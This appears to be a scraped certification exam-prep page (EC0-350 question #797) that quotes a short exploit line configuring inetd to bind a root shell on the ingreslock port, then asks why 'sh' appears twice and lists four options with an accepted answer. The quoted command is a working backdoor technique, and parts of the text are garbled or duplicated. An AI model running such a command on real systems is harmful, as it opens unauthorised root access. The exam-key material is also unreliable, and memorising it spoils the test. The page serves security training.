Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm 0f /tmp/x AAAA...AAA In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is `sh' shown twice?

Question

Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm 0f /tmp/x AAAA...AAA In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is `sh' shown twice?

Accepted Answer

A. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file.

Answer

B. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually.

Answer

C. It checks for the presence of a codeword (setting the environment variable) among the environment

Answer

D. It is a giveaway by the attacker that he is a script kiddy.

EC0-350 Question #797: Real Exam Question with Answer & Explanation

Question

Options

Community Discussion